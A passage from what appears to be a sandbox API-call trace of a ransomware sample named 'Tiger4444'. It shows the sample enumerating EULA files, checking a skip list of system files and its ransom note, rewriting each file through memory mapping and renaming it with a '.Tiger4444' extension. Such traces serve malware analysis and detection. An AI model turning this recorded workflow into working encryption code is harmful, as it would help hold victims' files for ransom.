lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0043.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0043.156] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13460907619) returned 1 [0043.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0043.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0043.156] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.157] CloseHandle (hObject=0x2c8) returned 1 [0043.157] CloseHandle (hObject=0x260) returned 1 [0043.160] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.Tiger4444") returned 62 [0043.160] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.161] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=110448 | out: Addend=0xc6f980) returned 9558944 [0043.161] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=12 | out: Addend=0xc6f98c) returned 3357 [0043.161] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c74ab, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c74ab, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3de0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_bg-bg.htm", cAlternateFileName="EULA_B~1.HTM")) returned 1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="Tiger4444.exe") returned -1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2=".") returned 1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="..") returned 1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="windows") returned -1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="bootmgr") returned 1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="pagefile.sys") returned -1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="boot") returned 1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="ids.txt") returned -1 [0043.161] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="NTUSER.DAT") returned -1 [0043.161] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_bg-bg.htm" | out: lpString1="EULA_bg-bg.htm") returned="EULA_bg-bg.htm" [0043.161] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm", dwFileAttributes=0x0) returned 1 [0043.161] lstrlenW (lpString="EULA_bg-bg.htm") returned 14 [0043.161] lstrlenW (lpString="Tiger4444") returned 9 [0043.161] lstrcmpiW (lpString1="bg-bg.htm", lpString2="Tiger4444") returned -1 [0043.161] lstrlenW (lpString=".dll") returned 4 [0043.161] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.161] lstrlenW (lpString=".lnk") returned 4 [0043.161] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.161] lstrlenW (lpString=".ini") returned 4 [0043.161] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.161] lstrlenW (lpString=".sys") returned 4 [0043.162] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.162] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.162] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.162] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13461477757) returned 1 [0043.162] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=253453) returned 1 [0043.162] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0043.162] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0043.162] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e110, lpName=0x0) returned 0x2c8 [0043.163] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e110) returned 0xbe0000 [0043.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0043.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0043.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0043.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0043.184] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13463724610) returned 1 [0043.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0043.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0043.184] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.186] CloseHandle (hObject=0x2c8) returned 1 [0043.187] CloseHandle (hObject=0x260) returned 1 [0043.193] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.Tiger4444") returned 62 [0043.193] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.193] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=253456 | out: Addend=0xc6f980) returned 9669392 [0043.194] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=22 | out: Addend=0xc6f98c) returned 3369 [0043.194] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c882e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c882e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x14573, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_cs-cz.htm", cAlternateFileName="EULA_C~1.HTM")) returned 1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="Tiger4444.exe") returned -1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2=".") returned 1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="..") returned 1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="windows") returned -1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="bootmgr") returned 1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="pagefile.sys") returned -1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="boot") returned 1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="ids.txt") returned -1 [0043.194] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="NTUSER.DAT") returned -1 [0043.194] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_cs-cz.htm" | out: lpString1="EULA_cs-cz.htm") returned="EULA_cs-cz.htm" [0043.194] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm", dwFileAttributes=0x0) returned 1 [0043.194] lstrlenW (lpString="EULA_cs-cz.htm") returned 14 [0043.194] lstrlenW (lpString="Tiger4444") returned 9 [0043.194] lstrcmpiW (lpString1="cs-cz.htm", lpString2="Tiger4444") returned -1 [0043.194] lstrlenW (lpString=".dll") returned 4 [0043.194] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.195] lstrlenW (lpString=".lnk") returned 4 [0043.195] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.195] lstrlenW (lpString=".ini") returned 4 [0043.195] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.195] lstrlenW (lpString=".sys") returned 4 [0043.195] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.195] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.195] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.195] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13464795037) returned 1 [0043.195] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=83315) returned 1 [0043.195] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0043.195] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0043.195] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14880, lpName=0x0) returned 0x2c8 [0043.196] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14880) returned 0xbe0000 [0043.250] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.250] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0043.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.250] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0043.250] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0043.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0043.250] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13470335988) returned 1 [0043.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0043.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0043.250] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.251] CloseHandle (hObject=0x2c8) returned 1 [0043.251] CloseHandle (hObject=0x260) returned 1 [0043.254] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.Tiger4444") returned 62 [0043.254] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_cs-cz.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_cs-cz.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.255] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=83328 | out: Addend=0xc6f980) returned 9922848 [0043.255] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=55 | out: Addend=0xc6f98c) returned 3391 [0043.255] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3caf18, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3caf18, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xfe95, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_da-dk.htm", cAlternateFileName="EULA_D~1.HTM")) returned 1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="Tiger4444.exe") returned -1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2=".") returned 1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="..") returned 1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="windows") returned -1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="bootmgr") returned 1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="pagefile.sys") returned -1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="boot") returned 1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="ids.txt") returned -1 [0043.255] lstrcmpiW (lpString1="EULA_da-dk.htm", lpString2="NTUSER.DAT") returned -1 [0043.255] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_da-dk.htm" | out: lpString1="EULA_da-dk.htm") returned="EULA_da-dk.htm" [0043.255] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm", dwFileAttributes=0x0) returned 1 [0043.257] lstrlenW (lpString="EULA_da-dk.htm") returned 14 [0043.257] lstrlenW (lpString="Tiger4444") returned 9 [0043.257] lstrcmpiW (lpString1="da-dk.htm", lpString2="Tiger4444") returned -1 [0043.257] lstrlenW (lpString=".dll") returned 4 [0043.257] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.257] lstrlenW (lpString=".lnk") returned 4 [0043.257] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.257] lstrlenW (lpString=".ini") returned 4 [0043.257] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.257] lstrlenW (lpString=".sys") returned 4 [0043.257] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.257] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.257] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.257] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13471009716) returned 1 [0043.257] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=65173) returned 1 [0043.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0043.257] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0043.257] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x101a0, lpName=0x0) returned 0x2c8 [0043.258] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101a0) returned 0xbe0000 [0043.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0043.271] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0043.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.271] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0043.271] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.271] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0043.271] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13472440364) returned 1 [0043.271] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0043.271] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0043.271] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.272] CloseHandle (hObject=0x2c8) returned 1 [0043.272] CloseHandle (hObject=0x260) returned 1 [0043.274] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.Tiger4444") returned 62 [0043.274] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_da-dk.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_da-dk.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.275] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=65184 | out: Addend=0xc6f980) returned 10006176 [0043.275] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=14 | out: Addend=0xc6f98c) returned 3446 [0043.275] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d10e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d10e9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1133d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_de-de.htm", cAlternateFileName="EULA_D~2.HTM")) returned 1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="Tiger4444.exe") returned -1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2=".") returned 1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="..") returned 1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="windows") returned -1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="bootmgr") returned 1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="pagefile.sys") returned -1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="boot") returned 1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="ids.txt") returned -1 [0043.275] lstrcmpiW (lpString1="EULA_de-de.htm", lpString2="NTUSER.DAT") returned -1 [0043.275] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_de-de.htm" | out: lpString1="EULA_de-de.htm") returned="EULA_de-de.htm" [0043.275] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm", dwFileAttributes=0x0) returned 1 [0043.276] lstrlenW (lpString="EULA_de-de.htm") returned 14 [0043.276] lstrlenW (lpString="Tiger4444") returned 9 [0043.276] lstrcmpiW (lpString1="de-de.htm", lpString2="Tiger4444") returned -1 [0043.276] lstrlenW (lpString=".dll") returned 4 [0043.276] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.276] lstrlenW (lpString=".lnk") returned 4 [0043.276] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.276] lstrlenW (lpString=".ini") returned 4 [0043.276] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.276] lstrlenW (lpString=".sys") returned 4 [0043.276] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.276] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.276] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.276] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13472910127) returned 1 [0043.276] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70461) returned 1 [0043.276] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0043.276] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0043.276] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11640, lpName=0x0) returned 0x2c8 [0043.277] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11640) returned 0xbe0000 [0043.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0043.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0043.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0043.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0043.290] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13474356697) returned 1 [0043.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0043.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0043.291] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.291] CloseHandle (hObject=0x2c8) returned 1 [0043.291] CloseHandle (hObject=0x260) returned 1 [0043.293] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.Tiger4444") returned 62 [0043.294] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_de-de.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_de-de.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.294] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=70464 | out: Addend=0xc6f980) returned 10071360 [0043.294] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=14 | out: Addend=0xc6f98c) returned 3460 [0043.294] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d2466, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d2466, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3a756, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_el-gr.htm", cAlternateFileName="EULA_E~1.HTM")) returned 1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="Tiger4444.exe") returned -1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2=".") returned 1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="..") returned 1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="windows") returned -1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="bootmgr") returned 1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="pagefile.sys") returned -1 [0043.294] lstrcmpiW 